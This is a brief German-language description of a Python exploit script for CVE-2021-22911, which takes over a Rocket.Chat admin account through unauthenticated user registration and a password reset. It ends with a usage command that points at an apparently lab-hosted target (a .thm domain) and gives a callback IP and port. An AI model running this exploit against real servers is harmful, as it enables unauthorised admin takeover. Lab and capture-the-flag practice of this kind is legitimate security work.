
Python-Exploit-Skript für CVE-2021-22911, das auf Rocket.Chat-Admin-Passwort-Reset durch nicht authentifizierte Benutzerregistrierung abzielt. Automatisiert die Ausnutzung mit konfigurierbarem Ziel, Admin-Benutzernamen und Callback-IP.
Wenn Sie bereits einen Benutzer registriert haben, wird dadurch nur das Admin-Passwort zurückgesetzt und nicht beides. Dadurch läuft der Exploit viel schneller.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80